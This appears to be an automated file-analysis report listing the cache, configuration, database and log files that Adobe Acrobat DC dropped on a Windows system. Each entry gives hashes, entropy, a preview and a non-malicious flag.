                    MD5:17EF11B0AE591EABC251369F58DF9D06
                    SHA1:BDABA65E561194C933899A4BFCFB3101A997EDA2
                    SHA-256:516221166463F6AAAC1C7E6EC177659680C546B3A4363969DA6147F879E56DE3
                    SHA-512:61315ABDBE33C71D73B60EA720E94EF760D6FF958DEF01C942C1BA4E45D9988A52D1EA7DE333248CF60F7183E0B06A22EA7A15E6D661769904A4A83A3FBBEC59
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.293845058447275
                    Encrypted:false
                    SSDEEP:
                    MD5:D21F713B738A6F2670DA234875C94D31
                    SHA1:6B7EFB283D33703C33BBCD1A596272D534DB4037
                    SHA-256:F0459CC97D1AF903E4678F9B27BABFD8385F6314A2CDDD5470985FBB612E74C2
                    SHA-512:91045CB9CD99E185131A6F902530C3ADD2207142E18F2BF714D1D6211B0D30442E058D94D4971F8311C6FBA74118525A085812D6447E668F6921CE407430A6CA
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):285
                    Entropy (8bit):5.356526676266571
                    Encrypted:false
                    SSDEEP:
                    MD5:A6696B94BFD117577A16B02C07760B8F
                    SHA1:920876BCAB4E8A7F5F9EE14B52148426CFF5D14F
                    SHA-256:004BCC5677BDF9E51FBB7EB3384C3097FE16C6408AC4E8DA33271805C18BF3E9
                    SHA-512:E1526CD78A18104537B85CFC632BC71CC88B73D67DBCEC966F030198BEF1C03C9AA1DCBD41A0FFA3B119FDB7C2EFDBB02EDB3990EB0899F6E6B3F2DA26C4C6C2
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2113
                    Entropy (8bit):5.843220928100596
                    Encrypted:false
                    SSDEEP:
                    MD5:0B359BBA7E32D652FB3A44F1693BEF0A
                    SHA1:33521BDCC9630DD26286EE9CD425873C1D59BB0D
                    SHA-256:35C03A87B5C90862F79B79A25DCE54ED20C30A29C53733BBD64E1F1F082F5999
                    SHA-512:D388A829A1233C83A084D995D76B905B1D154450841D839DFD791B65851E401E1DEEF875D61B39C03CD6D2FFE6EF2EC07C39C5DC0000B766580577A5A601C32B
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.30510768300891
                    Encrypted:false
                    SSDEEP:
                    MD5:252CDDFBF2143785C0446E23B8CCFB2D
                    SHA1:4F1248A77B3A436D35AF7F88CB340E754ADD8740
                    SHA-256:5971215374B9D8C537ABA296A44C890179C352E88D3CA73C47D51C95E39082D2
                    SHA-512:86324F3EAD0D247D45B52986B75064B4E4C88D35C1A5517D9304B29A21BCD92CF7B6C4F9DA26985D29534A0E6C40A5A3E416C95DE73364DB835B8482A4F71020
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.308289057747194
                    Encrypted:false
                    SSDEEP:
                    MD5:AE2F5C07B705E1B22692BE9FEAA2B8C8
                    SHA1:668521E368EF65E980DD3C28931D4974382427CB
                    SHA-256:25D9A3A4968C052FA43AB97B16C22B3433E28F27FE170B9A26A374D29FF2C731
                    SHA-512:C83515914880E45E543BC4DF59FC6C2ADB218A7F5009FD8D73F76BFFA38314A3F111E7833F6D8BB1C6D51879CA84BCB952DBDCFA0FAB48824DB31A673348519D
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2064
                    Entropy (8bit):5.825664977211851
                    Encrypted:false
                    SSDEEP:
                    MD5:8B1CF2B7EF3616BC9F238795DDD7DFDA
                    SHA1:0C056ED844B1EEF9ED41BF172A6E2045DFB130AC
                    SHA-256:B649189ECA1588459349FAA02F33B617B6C987513EE7701D3C52D7E09DBA7A45
                    SHA-512:6C3DF34A80A58D6098A2FEAC619DF1D6852524A2CB04441A853D8EA668D16CC5552CF4B9749FB3B82A8F7622FEE75DCB6D7DD50B2D5B898C8CA4A76D3E304AE1
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.330538947948233
                    Encrypted:false
                    SSDEEP:
                    MD5:88583798501983AC8554BCDA3D3885B1
                    SHA1:025735B98F0AA855660E42FC7EE9A4AD18CD6E69
                    SHA-256:6AC2D00434C0BBA8876FF0D4AA83AB833A9CA07FA377AE24D39ACF221D064FD9
                    SHA-512:13E85237FA7FE2447071FFBA41A467201605197DF89D4759C6B95C9D3E63BB613FC5223E512F57302D42D10E4D30D7DC694478C7F363AB39C2AA10714BB61D06
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.311692181957002
                    Encrypted:false
                    SSDEEP:
                    MD5:282873D4768D309334C0403D201F48EB
                    SHA1:665C6BEC904E46624898466550829BFE92E66D97
                    SHA-256:0423BAC8E98D716A9612F5B7638200AA1EAE5B4F3018E098A1F66074B1D9C6A1
                    SHA-512:53A7FD0FDEBB0FFD86D6F918C00051BBB7CF003ED03EAF06FD51F86DF30FF1BEE5B661B0D418766D29B858325B7D6086BC5DA3CC266A7FC8B5C300EC601B54C3
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):284
                    Entropy (8bit):5.297948403053765
                    Encrypted:false
                    SSDEEP:
                    MD5:2B70F642802E99255EF121A380E77019
                    SHA1:256439697755F983E65D8BBD6FD8CB2BC12943F7
                    SHA-256:B943DD284659A33E14264C2588CFD5786E9FD7D5C88B23F36E3674E0AE6BF417
                    SHA-512:813E1B70C13AB1DA32372D9306560DD91D3AE90CFED00A1F2D62D7BE3F77DC18135CDF1CB8220B744FB569AF9F09375ACDD542B48CD612C91DD71FCE3A91D0A4
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):291
                    Entropy (8bit):5.295158920991986
                    Encrypted:false
                    SSDEEP:
                    MD5:1605B791864AF20DEEC3A2F4813A44F2
                    SHA1:19B6E86684F70FCE20395A66942CAE46FBE5D885
                    SHA-256:BA6D5C4FDFD82823C6405C2D88967C78A0C59F911DBF6CA28D1317688A3B39EA
                    SHA-512:56D9C84A791C5AE628AD01411DDD1C6E3D76B2BBEA540ABBE875DA030861690608587D3D210F61696B9CA0ADE477ADC3B6B4F685DC745C9A228F0127E8073F46
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.298997944151284
                    Encrypted:false
                    SSDEEP:
                    MD5:D06C7435490BA89DEDB71BAE3E0FD9D1
                    SHA1:1A1BC333C7C17EE8888FAAA764C4309394A5D27D
                    SHA-256:5BF4D7687F8460FA937B302EB3B8EE1DFD9239240F544E365F12ACC82E168888
                    SHA-512:22734037EE8182366259DD7B5782A0E34A0CCDA074BA9F0F05E6485218CE14DB93AED23A4EF6511CBD69C8B03372A175DA91C55295D8C11D22959357CDC47DB0
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2012
                    Entropy (8bit):5.8393243044647365
                    Encrypted:false
                    SSDEEP:
                    MD5:1226A1F7593772B466C468CBCDACB6DA
                    SHA1:8483F5B443085EA9CE458589F5BA6D7130D28FE4
                    SHA-256:0FCFD50BA46998A0F31ACCE0838B696B12879CEEE908ED58810C6A2E737B5E82
                    SHA-512:38481073414C6E0F0CC2064B0998843AEA5C2FF28FF41F1F4A2374C33A926A7952CD0D4DFB633790D05B08CE27295F6AF75AFE3E10A746D8C7096E5DA6D193AD
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):5.275098963566754
                    Encrypted:false
                    SSDEEP:
                    MD5:6DEB7FF3D875A9DA18977F0DB892671B
                    SHA1:9CA830C22B0E564534EEF865D632694937B64FC6
                    SHA-256:2D27600D46B5F942915AF4E69F42DED7D914B5DA7D1DD32BCC8594777F49A7D3
                    SHA-512:C2A3B539A2A3640D1C3BFB4E72C54C64448F50FB781C72925B9000875570221BF737736E0760A43A45AED59CAB81EB8236D8A688726F10478A68D3EAC69FCF5D
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):282
                    Entropy (8bit):5.288337227019866
                    Encrypted:false
                    SSDEEP:
                    MD5:499A7332FE225AFE510665C886DB8AAA
                    SHA1:8098C58E7B9DCB2B3094EBFE140667E791E17D58
                    SHA-256:8D81A3D97B1B2479B385418E7B426F34BBDA6F727CB1BDE192C7AA647D1D89DC
                    SHA-512:F3E21DF53A90BB04D1AECD218CB8E0E8AF9AEA121C1CA1EE9B04CD2C244C50C7958C61709531A0BC54138462087873CE75E8E8EAD166B13030A329C09D664498
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4
                    Entropy (8bit):0.8112781244591328
                    Encrypted:false
                    SSDEEP:
                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                    Malicious:false
                    Reputation:unknown
                    Preview:....
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2815
                    Entropy (8bit):5.121887135472307
                    Encrypted:false
                    SSDEEP:
                    MD5:E9785D0774BF21EF632F817D6B97EACC
                    SHA1:D4929DB238FD3AD28A20F0ACF1BD2B18D68C5A98
                    SHA-256:7695E554000108DFB365FAFC541F272A2BED21BC60C1BFDEBEA1881196BDC2C4
                    SHA-512:D203EBC1CBB34D4EB98A0BC6490DC451478FA256F839781FBF79F5A3A19EF778638516EBE4FC79EE8DA8FBF46402F4BE52C75059AF1EE3CD2B39A44ECCCE5927
                    Malicious:false
                    Reputation:unknown
                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"644871db1f95722e30b605712f6d9f24","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742260670000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"8990506d7b2a36955b8b2b7ba5e60f0f","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2012,"ts":1742260670000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"00595b4155e3623ce16906b8ae2fbb4b","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2064,"ts":1742260670000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"89c8cbb215558fe24d213a5755f6dbf5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2113,"ts":1742260670000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8dde71ac5d6472abeea59f543a13593b","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742260670000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"76f04fad280781c75ff8629e954ea42e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                    Category:dropped
                    Size (bytes):12288
                    Entropy (8bit):0.9888236792776179
                    Encrypted:false
                    SSDEEP:
                    MD5:B1BDFB2F9F39067EB67B54EA88E56CC0
                    SHA1:C4AAE87B5BDB4D9873991395042C1EEDBB54ACF4
                    SHA-256:F46C67E572E46438DAF9BAA96043CD6EF4D0C5F2ADA76A781580A9E4BA9A8C25
                    SHA-512:4F3F8BDCA879C50BD134E643C08D222DB1D0D292D73B4BA3715891AC25B92E79D2BC4250DF4DFAA08A62B8F55693F092B25288496D2618DECD0BD5BABDD70920
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):8720
                    Entropy (8bit):1.3453898853724056
                    Encrypted:false
                    SSDEEP:
                    MD5:FCF973D7E11919E069D34A68089C9F01
                    SHA1:C61D7763AFAF2BD7A2A299105ACFD71D30239A51
                    SHA-256:0AA9DBC466F1817CD8DF9C1F1D3F560FB675D09588FF1C34B10ABD4A413DCE82
                    SHA-512:660932DFB605941ECD6557677E8499B882CE1EC7E83AD1192475299D02DDAA0DB644038DF22417C9401FD4B567EA553128EECED1D883C08170C0D7621FC71E43
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393)
                    Category:dropped
                    Size (bytes):16525
                    Entropy (8bit):5.353642815103214
                    Encrypted:false
                    SSDEEP:
                    MD5:91F06491552FC977E9E8AF47786EE7C1
                    SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                    SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                    SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                    Malicious:false
                    Reputation:unknown
                    Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                    Category:dropped
                    Size (bytes):15114
                    Entropy (8bit):5.381856923058665
                    Encrypted:false
                    SSDEEP:
                    MD5:BACB4E30B74A42FC33ADD80DF33E87D1
                    SHA1:ACDC76D19CF811127875D384BCCC15D0DFF5C11A
                    SHA-256:8D0AF1305FDC626F3068BD442D084646296C0E48A96D83D4739F6A007CFC32DD
                    SHA-512:7A97554B11E436CFA3B36B50FF2CB28E071977836BEDD766E9BA178D426451DDF373DDC8BF5523A7877AA1EE5D2A87C6DAB0193BE3399EA009E29DDA9F773F1C
                    Malicious:false
                    Reputation:unknown
                    Preview:SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:482-0400 ThreadID=6432 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_NglAppLib Description="SetConf
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):29752
                    Entropy (8bit):5.427681350276674
                    Encrypted:false
                    SSDEEP:
                    MD5:8E0F3037507CADDF24CF52FE250984E4
                    SHA1:8C7EC300E4CD4D3ACD0BFBB603BB7A64FB8A6AAA
                    SHA-256:978EB853EFEEDC89F2757842CB357694D4CFD419FB0B0D2DF082E0F4B990A934
                    SHA-512:CEE4CE006DF020257CE2CF745ADDFF8ADBD25FC0D192BAC6EEEECA701B960D5D01DE7E056F6665FC60AE30E6E57391F43D6712075854D1821361AF77232272BB
                    Malicious:false
                    Reputation:unknown
                    Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                    Category:dropped
                    Size (bytes):1407294
                    Entropy (8bit):7.97605879016224
                    Encrypted:false
                    SSDEEP:
                    MD5:1D64D25345DD73F100517644279994E6
                    SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                    SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                    SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                    Malicious:false
                    Reputation:unknown
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                    Category:dropped
                    Size (bytes):1419751
                    Entropy (8bit):7.976496077007677
                    Encrypted:false
                    SSDEEP:
                    MD5:9E1C73A645A9305F006E8DEACABC2978
                    SHA1:1871A2DED53AD50892F721C92197F18F1EAC7A4D
                    SHA-256:40D3FED1293133C81742989E75B7C37363068D96DFABF6E4890A452D97A13931
                    SHA-512:C27289F49A7E2ECC45C98E34FAB296D5BA34028ABB8C011DC07126D6F4C0E1729D875F0775B93391F63A6CC8A84BA098D001EBB593021CC404C66A8F0D7683CA
                    Malicious:false
                    Reputation:unknown
